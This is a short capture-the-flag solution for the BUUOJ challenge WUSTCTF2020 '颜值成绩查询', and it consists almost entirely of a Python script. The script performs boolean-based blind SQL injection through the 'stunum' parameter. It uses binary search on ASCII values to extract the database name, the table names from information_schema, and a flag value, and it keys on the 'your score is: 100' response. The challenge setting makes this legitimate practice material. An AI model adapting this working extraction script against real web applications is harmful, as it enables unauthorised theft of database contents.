[BUUOJ][WUSTCTF2020]颜值成绩查询 ---二分法

import requests

url = "http://93b7e81c-3dd4-4eaf-9ddf-8342b4e4bc7a.node3.buuoj.cn/?stunum="

result = ""
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1

        # payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
        # payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
        payload = "if(ascii(substr((select(value)from(flag)),%d,1))>%d,1,0)" % (
        i, mid)

        r = requests.get(url + payload)
        r.encoding = "utf-8"
        # print(url+payload)
        if "your score is: 100" in r.text:
            head = mid + 1
        else:
            # print(r.text)
            tail = mid

    last = result

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)